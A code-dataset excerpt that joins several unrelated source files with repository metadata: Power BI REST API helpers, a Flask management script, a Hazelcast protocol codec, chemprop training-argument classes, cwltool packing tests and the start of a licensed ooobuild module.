def import_report(workspace_id: str, report_name: str, in_file: str, name_conflict: str = "CreateOrOverwrite") -> dict:
global token
if(not verify_token()): return None
if(name_conflict in ["CreateOrOverwrite", "GenerateUniqueName", "Ignore", "Overwrite"]):
headers = { "Authorization": token["bearer"], "Content-Type": "multipart/form-data" }
file = { "file": open(in_file, "rb") }
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups/{}/imports?datasetDisplayName={}&nameConflict={}".format(workspace_id, report_name, name_conflict), headers = headers, files = file)
if response.status_code == HTTP_ACCEPTED:
return response.json()
else:
log.error("Error {} -- Something went wrong when trying to import the report {} in the workspace {}".format(response.status_code, in_file, workspace_id))
return None
else:
log.error("Error 400 -- Please, make sure the name_conflict parameter is either \"CreateOrOverwrite\", \"GenerateUniqueName\", \"Ignore\" or \"Overwrite\"")
return None
def clone_report(workspace_id: str, report_id: str, dest_report_name: str, dest_workspace_id: str = None) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
if dest_workspace_id: body = { "name": dest_report_name, "targetWorkspaceId": dest_workspace_id }
else: body = { "name": dest_report_name }
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups/{}/reports/{}/clone".format(workspace_id, report_id), headers = headers, data = body)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to clone the report {} in the workspace {}".format(response.status_code, report_id, workspace_id))
return None
# Dataset
def get_datasets(workspace_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/datasets".format(workspace_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the list of datasets in the workspace {}".format(response.status_code, workspace_id))
return None
def get_dataset(workspace_id: str, dataset_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}".format(workspace_id, dataset_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the dataset {} in the workspace {}".format(response.status_code, dataset_id, workspace_id))
return None
def delete_dataset(workspace_id: str, dataset_id: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.delete("https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}".format(workspace_id, dataset_id), headers = headers)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to delete the dataset {} in the workspace {}".format(response.status_code, dataset_id, workspace_id))
return None
def refresh_dataset(workspace_id: str, dataset_id: str, notify_option: str = "NoNotification") -> dict:
global token
if(not verify_token()): return None
if(notify_option in ["MailOnCompletion", "MailOnFailure", "NoNotification"]):
headers = { "Authorization": token["bearer"] }
body = { "notifyOption": notify_option }
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/refreshes".format(workspace_id, dataset_id), headers = headers, data = body)
if response.status_code == HTTP_ACCEPTED:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to refresh the dataset {} in the workspace {}".format(response.status_code, dataset_id, workspace_id))
return None
else:
log.error("Error 400 -- Please, make sure the notify_option parameter is either \"MailOnCompletion\", \"MailOnFailure\" or \"NoNotification\"")
return None
# Admin
def get_audit_logs(start_date: str, end_date: str, activity: str = None, user_id: str = None) -> list:
global token
if(not verify_token()): return None
date_regex = r"^\d\d\d\d-(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[01]) (00|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$"
start_date_verification = re.search(date_regex, start_date)
end_date_verification = re.search(date_regex, end_date)
if(start_date_verification and end_date_verification):
start_date_value = datetime.datetime.strptime(start_date, "%Y-%m-%d %H:%M:%S").strftime("%Y-%m-%dT%H:%M:%S.000Z")
end_date_value = datetime.datetime.strptime(end_date, "%Y-%m-%d %H:%M:%S").strftime("%Y-%m-%dT%H:%M:%S.000Z")
headers = { "Authorization": token["bearer"] }
params = ""
if activity:
params += "Activity eq '{}'".format(activity)
if user_id:
if params != "": params += " and "
params += "UserId eq '{}'".format(user_id)
if params == "": url = "https://api.powerbi.com/v1.0/myorg/admin/activityevents?startDateTime='{}'&endDateTime='{}'".format(start_date_value, end_date_value)
else: url = "https://api.powerbi.com/v1.0/myorg/admin/activityevents?startDateTime='{}'&endDateTime='{}'&$filter={}".format(start_date_value, end_date_value, params)
response = requests.get(url, headers = headers)
if response.status_code == HTTP_OK:
logs = []
while(response.json()["continuationUri"] != None):
logs += response.json()["activityEventEntities"]
response = requests.get(response.json()["continuationUri"], headers = headers)
if response.status_code != HTTP_OK:
log.error("Error {} -- Something went wrong when trying to retrieve audit logs from {} to {}".format(response.status_code, start_date, end_date))
return None
return logs
else:
log.error("Error {} -- Something went wrong when trying to retrieve audit logs from {} to {}".format(response.status_code, start_date, end_date))
print(response.json())
return None
else:
log.error("Error 400 -- Please, make sure the dates you gave match the following pattern: YYYY-MM-DD HH:MM:SS")
return None
| 45.733167
| 208
| 0.658378
|
d7166501c5e7cb157a9a49fbd794284066fed44e
| 776
|
py
|
Python
|
manage.py
|
skazi0/car-stats
|
e643ed47dfb90094fcc8663bce90b879af31b546
|
[
"MIT"
] | null | null | null |
manage.py
|
skazi0/car-stats
|
e643ed47dfb90094fcc8663bce90b879af31b546
|
[
"MIT"
] | null | null | null |
manage.py
|
skazi0/car-stats
|
e643ed47dfb90094fcc8663bce90b879af31b546
|
[
"MIT"
] | null | null | null |
from flask_script import Manager, Server
from flask_migrate import Migrate, MigrateCommand
from app import app, db
from app.models import User
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
manager.add_command('runserver', Server(host='0.0.0.0', port=22778))
@manager.command
def create_db():
"""Creates the db tables."""
db.create_all()
@manager.command
def drop_db():
"""Drops the db tables."""
db.drop_all()
@manager.command
def create_admin():
"""Creates the admin user."""
db.session.add(User(email='ad@min.com', password='admin', admin=True))
db.session.commit()
@manager.command
def create_data():
"""Creates sample data."""
pass
if __name__ == '__main__':
manager.run()
| 18.926829
| 74
| 0.69201
|
e956124bb37469c715e66eacdee2a51d8d21cd88
| 1,258
|
py
|
Python
|
hazelcast/protocol/codec/map_values_codec.py
|
murdockn/hazelcast-python-client
|
597d90be5414cd56340fafcff916191704dcb86d
|
[
"Apache-2.0"
] | null | null | null |
hazelcast/protocol/codec/map_values_codec.py
|
murdockn/hazelcast-python-client
|
597d90be5414cd56340fafcff916191704dcb86d
|
[
"Apache-2.0"
] | null | null | null |
hazelcast/protocol/codec/map_values_codec.py
|
murdockn/hazelcast-python-client
|
597d90be5414cd56340fafcff916191704dcb86d
|
[
"Apache-2.0"
] | null | null | null |
from hazelcast.serialization.bits import *
from hazelcast.protocol.client_message import ClientMessage
from hazelcast.protocol.custom_codec import *
from hazelcast.util import ImmutableLazyDataList
from hazelcast.protocol.codec.map_message_type import *
REQUEST_TYPE = MAP_VALUES
RESPONSE_TYPE = 106
RETRYABLE = False
def calculate_size(name):
""" Calculates the request payload size"""
data_size = 0
data_size += calculate_size_str(name)
return data_size
def encode_request(name):
""" Encode request into client_message"""
client_message = ClientMessage(payload_size=calculate_size(name))
client_message.set_message_type(REQUEST_TYPE)
client_message.set_retryable(RETRYABLE)
client_message.append_str(name)
client_message.update_frame_length()
return client_message
def decode_response(client_message, to_object=None):
""" Decode response from client message"""
parameters = dict(response=None)
response_size = client_message.read_int()
response = []
for response_index in xrange(0, response_size):
response_item = client_message.read_data()
response.append(response_item)
parameters['response'] = ImmutableLazyDataList(response, to_object)
return parameters
| 29.952381
| 71
| 0.769475
|
439d146a52f6562d82801e660fca9e8f9cb2e101
| 20,447
|
py
|
Python
|
chemprop/args.py
|
anonymous20201002/chemprop
|
3e36f6a3bb36194366feadb31be94dfc7e98fd91
|
[
"MIT"
] | 1
|
2022-02-12T06:39:32.000Z
|
2022-02-12T06:39:32.000Z
|
chemprop/args.py
|
anonymous20201002/chemprop
|
3e36f6a3bb36194366feadb31be94dfc7e98fd91
|
[
"MIT"
] | null | null | null |
chemprop/args.py
|
anonymous20201002/chemprop
|
3e36f6a3bb36194366feadb31be94dfc7e98fd91
|
[
"MIT"
] | null | null | null |
import json
import os
from tempfile import TemporaryDirectory
import pickle
from typing import List, Optional, Tuple
from typing_extensions import Literal
import torch
from tap import Tap # pip install typed-argument-parser (https://github.com/swansonk14/typed-argument-parser)
from chemprop.features import get_available_features_generators
def get_checkpoint_paths(checkpoint_path: Optional[str] = None,
checkpoint_paths: Optional[List[str]] = None,
checkpoint_dir: Optional[str] = None,
ext: str = '.pt') -> Optional[List[str]]:
"""
Gets a list of checkpoint paths either from a single checkpoint path or from a directory of checkpoints.
If :code:`checkpoint_path` is provided, only collects that one checkpoint.
If :code:`checkpoint_paths` is provided, collects all of the provided checkpoints.
If :code:`checkpoint_dir` is provided, walks the directory and collects all checkpoints.
A checkpoint is any file ending in the extension ext.
:param checkpoint_path: Path to a checkpoint.
:param checkpoint_paths: List of paths to checkpoints.
:param checkpoint_dir: Path to a directory containing checkpoints.
:param ext: The extension which defines a checkpoint file.
:return: A list of paths to checkpoints or None if no checkpoint path(s)/dir are provided.
"""
if sum(var is not None for var in [checkpoint_dir, checkpoint_path, checkpoint_paths]) > 1:
raise ValueError('Can only specify one of checkpoint_dir, checkpoint_path, and checkpoint_paths')
if checkpoint_path is not None:
return [checkpoint_path]
if checkpoint_paths is not None:
return checkpoint_paths
if checkpoint_dir is not None:
checkpoint_paths = []
for root, _, files in os.walk(checkpoint_dir):
for fname in files:
if fname.endswith(ext):
checkpoint_paths.append(os.path.join(root, fname))
if len(checkpoint_paths) == 0:
raise ValueError(f'Failed to find any checkpoints with extension "{ext}" in directory "{checkpoint_dir}"')
return checkpoint_paths
return None
class CommonArgs(Tap):
""":class:`CommonArgs` contains arguments that are used in both :class:`TrainArgs` and :class:`PredictArgs`."""
smiles_column: str = None
"""Name of the column containing SMILES strings. By default, uses the first column."""
checkpoint_dir: str = None
"""Directory from which to load model checkpoints (walks directory and ensembles all models that are found)."""
checkpoint_path: str = None
"""Path to model checkpoint (:code:`.pt` file)."""
checkpoint_paths: List[str] = None
"""List of paths to model checkpoints (:code:`.pt` files)."""
no_cuda: bool = False
"""Turn off cuda (i.e., use CPU instead of GPU)."""
gpu: int = None
"""Which GPU to use."""
features_generator: List[str] = None
"""Method(s) of generating additional features."""
features_path: List[str] = None
"""Path(s) to features to use in FNN (instead of features_generator)."""
no_features_scaling: bool = False
"""Turn off scaling of features."""
max_data_size: int = None
"""Maximum number of data points to load."""
num_workers: int = 8
"""Number of workers for the parallel data loading (0 means sequential)."""
batch_size: int = 50
"""Batch size."""
@property
def device(self) -> torch.device:
"""The :code:`torch.device` on which to load and process data and models."""
if not self.cuda:
return torch.device('cpu')
return torch.device('cuda', self.gpu)
@device.setter
def device(self, device: torch.device) -> None:
self.cuda = device.type == 'cuda'
self.gpu = device.index
@property
def cuda(self) -> bool:
"""Whether to use CUDA (i.e., GPUs) or not."""
return not self.no_cuda and torch.cuda.is_available()
@cuda.setter
def cuda(self, cuda: bool) -> None:
self.no_cuda = not cuda
@property
def features_scaling(self) -> bool:
"""Whether to apply normalization with a :class:`~chemprop.data.scaler.StandardScaler` to the additional molecule-level features."""
return not self.no_features_scaling
def add_arguments(self) -> None:
self.add_argument('--gpu', choices=list(range(torch.cuda.device_count())))
self.add_argument('--features_generator', choices=get_available_features_generators())
def process_args(self) -> None:
# Load checkpoint paths
self.checkpoint_paths = get_checkpoint_paths(
checkpoint_path=self.checkpoint_path,
checkpoint_paths=self.checkpoint_paths,
checkpoint_dir=self.checkpoint_dir,
)
# Validate features
if self.features_generator is not None and 'rdkit_2d_normalized' in self.features_generator and self.features_scaling:
raise ValueError('When using rdkit_2d_normalized features, --no_features_scaling must be specified.')
class TrainArgs(CommonArgs):
""":class:`TrainArgs` includes :class:`CommonArgs` along with additional arguments used for training a Chemprop model."""
# General arguments
data_path: str
"""Path to data CSV file."""
target_columns: List[str] = None
"""
Name of the columns containing target values.
By default, uses all columns except the SMILES column and the :code:`ignore_columns`.
"""
ignore_columns: List[str] = None
"""Name of the columns to ignore when :code:`target_columns` is not provided."""
dataset_type: Literal['regression', 'classification', 'multiclass']
"""Type of dataset. This determines the loss function used during training."""
multiclass_num_classes: int = 3
"""Number of classes when running multiclass classification."""
separate_val_path: str = None
"""Path to separate val set, optional."""
separate_test_path: str = None
"""Path to separate test set, optional."""
split_type: Literal['random', 'scaffold_balanced', 'predetermined', 'crossval', 'index_predetermined'] = 'random'
"""Method of splitting the data into train/val/test."""
split_sizes: Tuple[float, float, float] = (0.8, 0.1, 0.1)
"""Split proportions for train/validation/test sets."""
num_folds: int = 1
"""Number of folds when performing cross validation."""
folds_file: str = None
"""Optional file of fold labels."""
val_fold_index: int = None
"""Which fold to use as val for leave-one-out cross val."""
test_fold_index: int = None
"""Which fold to use as test for leave-one-out cross val."""
crossval_index_dir: str = None
"""Directory in which to find cross validation index files."""
crossval_index_file: str = None
"""Indices of files to use as train/val/test. Overrides :code:`--num_folds` and :code:`--seed`."""
seed: int = 0
"""
Random seed to use when splitting data into train/val/test sets.
When :code`num_folds > 1`, the first fold uses this seed and all subsequent folds add 1 to the seed.
"""
pytorch_seed: int = 0
"""Seed for PyTorch randomness (e.g., random initial weights)."""
metric: Literal['auc', 'prc-auc', 'rmse', 'mae', 'mse', 'r2', 'accuracy', 'cross_entropy'] = None
"""Metric to use during evaluation. Defaults to "auc" for classification and "rmse" for regression."""
save_dir: str = None
"""Directory where model checkpoints will be saved."""
save_smiles_splits: bool = False
"""Save smiles for each train/val/test splits for prediction convenience later."""
test: bool = False
"""Whether to skip training and only test the model."""
quiet: bool = False
"""Skip non-essential print statements."""
log_frequency: int = 10
"""The number of batches between each logging of the training loss."""
show_individual_scores: bool = False
"""Show all scores for individual targets, not just average, at the end."""
cache_cutoff: int = 10000
"""
Maximum number of molecules in dataset to allow caching.
Below this number, caching is used and data loading is sequential.
Above this number, caching is not used and data loading is parallel.
"""
# Model arguments
bias: bool = False
"""Whether to add bias to linear layers."""
hidden_size: int = 300
"""Dimensionality of hidden layers in MPN."""
depth: int = 3
"""Number of message passing steps."""
dropout: float = 0.0
"""Dropout probability."""
activation: Literal['ReLU', 'LeakyReLU', 'PReLU', 'tanh', 'SELU', 'ELU'] = 'ReLU'
"""Activation function."""
atom_messages: bool = False
"""Centers messages on atoms instead of on bonds."""
undirected: bool = False
"""Undirected edges (always sum the two relevant bond vectors)."""
ffn_hidden_size: int = None
"""Hidden dim for higher-capacity FFN (defaults to hidden_size)."""
ffn_num_layers: int = 2
"""Number of layers in FFN after MPN encoding."""
features_only: bool = False
"""Use only the additional features in an FFN, no graph network."""
separate_val_features_path: List[str] = None
"""Path to file with features for separate val set."""
separate_test_features_path: List[str] = None
"""Path to file with features for separate test set."""
config_path: str = None
"""
Path to a :code:`.json` file containing arguments. Any arguments present in the config file
will override arguments specified via the command line or by the defaults.
"""
ensemble_size: int = 1
"""Number of models in ensemble."""
# Training arguments
epochs: int = 30
"""Number of epochs to run."""
warmup_epochs: float = 2.0
"""
Number of epochs during which learning rate increases linearly from :code:`init_lr` to :code:`max_lr`.
Afterwards, learning rate decreases exponentially from :code:`max_lr` to :code:`final_lr`.
"""
init_lr: float = 1e-4
"""Initial learning rate."""
max_lr: float = 1e-3
"""Maximum learning rate."""
final_lr: float = 1e-4
"""Final learning rate."""
grad_clip: float = None
"""Maximum magnitude of gradient during training."""
class_balance: bool = False
"""Trains with an equal number of positives and negatives in each batch (only for single task classification)."""
def __init__(self, *args, **kwargs) -> None:
super(TrainArgs, self).__init__(*args, **kwargs)
self._task_names = None
self._crossval_index_sets = None
self._task_names = None
self._num_tasks = None
self._features_size = None
self._train_data_size = None
@property
def minimize_score(self) -> bool:
"""Whether the model should try to minimize the score metric or maximize it."""
return self.metric in {'rmse', 'mae', 'mse', 'cross_entropy'}
@property
def use_input_features(self) -> bool:
"""Whether the model is using additional molecule-level features."""
return self.features_generator is not None or self.features_path is not None
@property
def num_lrs(self) -> int:
"""The number of learning rates to use (currently hard-coded to 1)."""
return 1
@property
def crossval_index_sets(self) -> List[List[List[int]]]:
"""Index sets used for splitting data into train/validation/test during cross-validation"""
return self._crossval_index_sets
@property
def task_names(self) -> List[str]:
"""A list of names of the tasks being trained on."""
return self._task_names
@task_names.setter
def task_names(self, task_names: List[str]) -> None:
self._task_names = task_names
@property
def num_tasks(self) -> int:
"""The number of tasks being trained on."""
return len(self.task_names) if self.task_names is not None else 0
@property
def features_size(self) -> int:
"""The dimensionality of the additional molecule-level features."""
return self._features_size
@features_size.setter
def features_size(self, features_size: int) -> None:
self._features_size = features_size
@property
def train_data_size(self) -> int:
"""The size of the training data set."""
return self._train_data_size
@train_data_size.setter
def train_data_size(self, train_data_size: int) -> None:
self._train_data_size = train_data_size
def process_args(self) -> None:
super(TrainArgs, self).process_args()
global temp_dir # Prevents the temporary directory from being deleted upon function return
# Load config file
if self.config_path is not None:
with open(self.config_path) as f:
config = json.load(f)
for key, value in config.items():
setattr(self, key, value)
# Create temporary directory as save directory if not provided
if self.save_dir is None:
temp_dir = TemporaryDirectory()
self.save_dir = temp_dir.name
# Fix ensemble size if loading checkpoints
if self.checkpoint_paths is not None and len(self.checkpoint_paths) > 0:
self.ensemble_size = len(self.checkpoint_paths)
# Process and validate metric and loss function
if self.metric is None:
if self.dataset_type == 'classification':
self.metric = 'auc'
elif self.dataset_type == 'multiclass':
self.metric = 'cross_entropy'
else:
self.metric = 'rmse'
if not ((self.dataset_type == 'classification' and self.metric in ['auc', 'prc-auc', 'accuracy']) or
(self.dataset_type == 'regression' and self.metric in ['rmse', 'mae', 'mse', 'r2']) or
(self.dataset_type == 'multiclass' and self.metric in ['cross_entropy', 'accuracy'])):
raise ValueError(f'Metric "{self.metric}" invalid for dataset type "{self.dataset_type}".')
# Validate class balance
if self.class_balance and self.dataset_type != 'classification':
raise ValueError('Class balance can only be applied if the dataset type is classification.')
# Validate features
if self.features_only and not (self.features_generator or self.features_path):
raise ValueError('When using features_only, a features_generator or features_path must be provided.')
# Handle FFN hidden size
if self.ffn_hidden_size is None:
self.ffn_hidden_size = self.hidden_size
# Handle MPN variants
if self.atom_messages and self.undirected:
raise ValueError('Undirected is unnecessary when using atom_messages '
'since atom_messages are by their nature undirected.')
# Validate split type settings
if not (self.split_type == 'predetermined') == (self.folds_file is not None) == (self.test_fold_index is not None):
raise ValueError('When using predetermined split type, must provide folds_file and test_fold_index.')
if not (self.split_type == 'crossval') == (self.crossval_index_dir is not None):
raise ValueError('When using crossval split type, must provide crossval_index_dir.')
if not (self.split_type in ['crossval', 'index_predetermined']) == (self.crossval_index_file is not None):
raise ValueError('When using crossval or index_predetermined split type, must provide crossval_index_file.')
if self.split_type in ['crossval', 'index_predetermined']:
with open(self.crossval_index_file, 'rb') as rf:
self._crossval_index_sets = pickle.load(rf)
self.num_folds = len(self.crossval_index_sets)
self.seed = 0
# Test settings
if self.test:
self.epochs = 0
class PredictArgs(CommonArgs):
""":class:`PredictArgs` includes :class:`CommonArgs` along with additional arguments used for predicting with a Chemprop model."""
test_path: str
"""Path to CSV file containing testing data for which predictions will be made."""
preds_path: str
"""Path to CSV file where predictions will be saved."""
@property
def ensemble_size(self) -> int:
"""The number of models in the ensemble."""
return len(self.checkpoint_paths)
def process_args(self) -> None:
super(PredictArgs, self).process_args()
if self.checkpoint_paths is None or len(self.checkpoint_paths) == 0:
raise ValueError('Found no checkpoints. Must specify --checkpoint_path <path> or '
'--checkpoint_dir <dir> containing at least one checkpoint.')
class InterpretArgs(CommonArgs):
""":class:`InterpretArgs` includes :class:`CommonArgs` along with additional arguments used for interpreting a trained Chemprop model."""
data_path: str
"""Path to data CSV file."""
batch_size: int = 500
"""Batch size."""
property_id: int = 1
"""Index of the property of interest in the trained model."""
rollout: int = 20
"""Number of rollout steps."""
c_puct: float = 10.0
"""Constant factor in MCTS."""
max_atoms: int = 20
"""Maximum number of atoms in rationale."""
min_atoms: int = 8
"""Minimum number of atoms in rationale."""
prop_delta: float = 0.5
"""Minimum score to count as positive."""
def process_args(self) -> None:
super(InterpretArgs, self).process_args()
if self.features_path is not None:
raise ValueError('Cannot use --features_path <path> for interpretation since features '
'need to be computed dynamically for molecular substructures. '
'Please specify --features_generator <generator>.')
if self.checkpoint_paths is None or len(self.checkpoint_paths) == 0:
raise ValueError('Found no checkpoints. Must specify --checkpoint_path <path> or '
'--checkpoint_dir <dir> containing at least one checkpoint.')
class HyperoptArgs(TrainArgs):
""":class:`HyperoptArgs` includes :class:`TrainArgs` along with additional arguments used for optimizing Chemprop hyperparameters."""
num_iters: int = 20
"""Number of hyperparameter choices to try."""
config_save_path: str
"""Path to :code:`.json` file where best hyperparameter settings will be written."""
log_dir: str = None
"""(Optional) Path to a directory where all results of the hyperparameter optimization will be written."""
class SklearnTrainArgs(TrainArgs):
""":class:`SklearnTrainArgs` includes :class:`TrainArgs` along with additional arguments for training a scikit-learn model."""
model_type: Literal['random_forest', 'svm']
"""scikit-learn model to use."""
class_weight: Literal['balanced'] = None
"""How to weight classes (None means no class balance)."""
single_task: bool = False
"""Whether to run each task separately (needed when dataset has null entries)."""
radius: int = 2
"""Morgan fingerprint radius."""
num_bits: int = 2048
"""Number of bits in morgan fingerprint."""
num_trees: int = 500
"""Number of random forest trees."""
class SklearnPredictArgs(Tap):
""":class:`SklearnPredictArgs` contains arguments used for predicting with a trained scikit-learn model."""
test_path: str
"""Path to CSV file containing testing data for which predictions will be made."""
smiles_column: str = None
"""Name of the column containing SMILES strings. By default, uses the first column."""
preds_path: str
"""Path to CSV file where predictions will be saved."""
checkpoint_dir: str = None
"""Path to directory containing model checkpoints (:code:`.pkl` file)"""
checkpoint_path: str = None
"""Path to model checkpoint (:code:`.pkl` file)"""
checkpoint_paths: List[str] = None
"""List of paths to model checkpoints (:code:`.pkl` files)"""
def process_args(self) -> None:
# Load checkpoint paths
self.checkpoint_paths = get_checkpoint_paths(
checkpoint_path=self.checkpoint_path,
checkpoint_paths=self.checkpoint_paths,
checkpoint_dir=self.checkpoint_dir,
ext='.pkl'
)
| 42.072016
| 141
| 0.66308
|
a03cd8262a69b431c9d3018ee6c8407f468f1be1
| 7,462
|
py
|
Python
|
tests/test_pack.py
|
hknust/cwltool
|
2978c8bff88be2ad357554c9291cc992d3e74a47
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pack.py
|
hknust/cwltool
|
2978c8bff88be2ad357554c9291cc992d3e74a47
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pack.py
|
hknust/cwltool
|
2978c8bff88be2ad357554c9291cc992d3e74a47
|
[
"Apache-2.0"
] | null | null | null |
import json
import os
import tempfile
from functools import partial
from io import StringIO
from tempfile import NamedTemporaryFile
import pytest
import cwltool.pack
import cwltool.workflow
from cwltool import load_tool
from cwltool.context import LoadingContext
from cwltool.load_tool import fetch_document, resolve_and_validate_document
from cwltool.main import main, make_relative, print_pack
from cwltool.pathmapper import adjustDirObjs, adjustFileObjs
from cwltool.resolver import tool_resolver
from ruamel import yaml
from .util import get_data, needs_docker
def test_pack():
loadingContext, workflowobj, uri = fetch_document(get_data("tests/wf/revsort.cwl"))
with open(get_data("tests/wf/expect_packed.cwl")) as packed_file:
expect_packed = yaml.safe_load(packed_file)
packed = cwltool.pack.pack(loadingContext, uri)
adjustFileObjs(
packed, partial(make_relative, os.path.abspath(get_data("tests/wf")))
)
adjustDirObjs(packed, partial(make_relative, os.path.abspath(get_data("tests/wf"))))
assert "$schemas" in packed
assert len(packed["$schemas"]) == len(expect_packed["$schemas"])
del packed["$schemas"]
del expect_packed["$schemas"]
assert packed == expect_packed
def test_pack_input_named_name():
loadingContext, workflowobj, uri = fetch_document(
get_data("tests/wf/trick_revsort.cwl")
)
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
with open(get_data("tests/wf/expect_trick_packed.cwl")) as packed_file:
expect_packed = yaml.round_trip_load(packed_file)
packed = cwltool.pack.pack(loadingContext, uri)
adjustFileObjs(
packed, partial(make_relative, os.path.abspath(get_data("tests/wf")))
)
adjustDirObjs(packed, partial(make_relative, os.path.abspath(get_data("tests/wf"))))
assert "$schemas" in packed
assert len(packed["$schemas"]) == len(expect_packed["$schemas"])
del packed["$schemas"]
del expect_packed["$schemas"]
assert packed == expect_packed
def test_pack_single_tool():
loadingContext, workflowobj, uri = fetch_document(
get_data("tests/wf/formattest.cwl")
)
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
packed = cwltool.pack.pack(loadingContext, uri)
assert "$schemas" in packed
def test_pack_fragment():
with open(get_data("tests/wf/scatter2_subwf.cwl")) as packed_file:
expect_packed = yaml.safe_load(packed_file)
loadingContext, workflowobj, uri = fetch_document(get_data("tests/wf/scatter2.cwl"))
packed = cwltool.pack.pack(loadingContext, uri + "#scatterstep/mysub")
adjustFileObjs(
packed, partial(make_relative, os.path.abspath(get_data("tests/wf")))
)
adjustDirObjs(packed, partial(make_relative, os.path.abspath(get_data("tests/wf"))))
assert json.dumps(packed, sort_keys=True, indent=2) == json.dumps(
expect_packed, sort_keys=True, indent=2
)
def test_pack_rewrites():
rewrites = {}
loadingContext, workflowobj, uri = fetch_document(
get_data("tests/wf/default-wf5.cwl")
)
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
cwltool.pack.pack(
loadingContext, uri, rewrite_out=rewrites,
)
assert len(rewrites) == 6
cwl_missing_version_paths = [
"tests/wf/hello_single_tool.cwl",
"tests/wf/hello-workflow.cwl",
]
@pytest.mark.parametrize("cwl_path", cwl_missing_version_paths)
def test_pack_missing_cwlVersion(cwl_path):
"""Ensure the generated pack output is not missing the `cwlVersion` in case of single tool workflow and single step workflow."""
# Testing single tool workflow
loadingContext, workflowobj, uri = fetch_document(get_data(cwl_path))
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
# generate pack output dict
packed = json.loads(print_pack(loadingContext, uri))
assert packed["cwlVersion"] == "v1.0"
def test_pack_idempotence_tool():
"""Ensure that pack produces exactly the same document for an already packed CommandLineTool."""
_pack_idempotently("tests/wf/hello_single_tool.cwl")
def test_pack_idempotence_workflow():
"""Ensure that pack produces exactly the same document for an already packed workflow."""
_pack_idempotently("tests/wf/count-lines1-wf.cwl")
def _pack_idempotently(document):
loadingContext, workflowobj, uri = fetch_document(get_data(document))
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
# generate pack output dict
packed_text = print_pack(loadingContext, uri)
packed = json.loads(packed_text)
tmp = NamedTemporaryFile(mode="w", delete=False)
try:
tmp.write(packed_text)
tmp.flush()
tmp.close()
loadingContext, workflowobj, uri2 = fetch_document(tmp.name)
loadingContext.do_update = False
loadingContext, uri2 = resolve_and_validate_document(
loadingContext, workflowobj, uri2
)
processobj = loadingContext.loader.resolve_ref(uri2)[0]
# generate pack output dict
packed_text = print_pack(loadingContext, uri2)
double_packed = json.loads(packed_text)
finally:
os.remove(tmp.name)
assert uri != uri2
assert packed == double_packed
cwl_to_run = [
("tests/wf/count-lines1-wf.cwl", "tests/wf/wc-job.json", False),
("tests/wf/formattest.cwl", "tests/wf/formattest-job.json", True),
]
@needs_docker
@pytest.mark.parametrize("wf_path,job_path,namespaced", cwl_to_run)
def test_packed_workflow_execution(wf_path, job_path, namespaced, tmpdir):
loadingContext = LoadingContext()
loadingContext.resolver = tool_resolver
loadingContext, workflowobj, uri = fetch_document(get_data(wf_path), loadingContext)
loadingContext.do_update = False
loadingContext, uri = resolve_and_validate_document(
loadingContext, workflowobj, uri
)
processobj = loadingContext.loader.resolve_ref(uri)[0]
packed = json.loads(print_pack(loadingContext, uri))
assert not namespaced or "$namespaces" in packed
wf_packed_handle, wf_packed_path = tempfile.mkstemp()
with open(wf_packed_path, "w") as temp_file:
json.dump(packed, temp_file)
normal_output = StringIO()
packed_output = StringIO()
normal_params = ["--outdir", str(tmpdir), get_data(wf_path), get_data(job_path)]
packed_params = [
"--outdir",
str(tmpdir),
"--debug",
wf_packed_path,
get_data(job_path),
]
assert main(normal_params, stdout=normal_output) == 0
assert main(packed_params, stdout=packed_output) == 0
assert json.loads(packed_output.getvalue()) == json.loads(normal_output.getvalue())
os.close(wf_packed_handle)
os.remove(wf_packed_path)
| 32.30303
| 132
| 0.71978
|
f211396a755b227da6119426ab86a5fe976977a0
| 4,578
|
py
|
Python
|
ooobuild/lo/ucb/fetch_result.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
ooobuild/lo/ucb/fetch_result.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
ooobuild/lo/ucb/fetch_result.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
